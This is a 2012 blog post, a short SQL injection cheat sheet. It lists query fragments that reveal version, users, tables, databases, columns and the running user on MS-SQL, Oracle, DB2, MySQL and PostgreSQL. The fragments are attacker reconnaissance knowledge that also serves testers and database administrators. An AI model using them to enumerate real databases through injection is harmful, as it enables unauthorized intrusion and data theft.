SQL Injection Cheat Sheet
Posted on Tuesday, January 03, 2012 by Tenderfoot
Common SQL Injection Commands for Backend Databases | |
MS-SQL | |
Grab version | @@version |
Users | name FROM master..syslogins |
Tables | name FROM master..sysobjects WHERE xtype = 'U' |
Database | name FROM master..sysdatabases; |
Columns | name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLENAME>') |
Running User | DB_NAME() |
Oracle | |
Grab version | table v$version compare with 'Oracle%' |
Users | * from dba_users |
Tables | table_name from all_tables |
Database | distinct owner from all_tables |
Columns | column_name from all_tab_columns where table_name='<TABLENAME>' |
Running User | user from dual |
IBM DB2 | |
Grab version | Versionnumber from sysibm.sysversions; |
Users | user from sysibm.sysdummy1 |
Tables | name from sysibm.systables |
Database | schemaname from syscat.schemata |
Columns | name, tbname, coltype from sysibm.syscolumns |
Running User | user from sysibm.sysdummy1 |
MySQL | |
Grab version | @@version |
Users | * from mysql.user |
Tables | table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
Database | distinct(db) FROM mysql.db |
Columns | table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name = '<TABLENAME>' |
Running User | user() |
PostgreSQL | |
Grab version | version() |
Users | * from pg_user |
Database | datname FROM pg_database |
Running User | user; |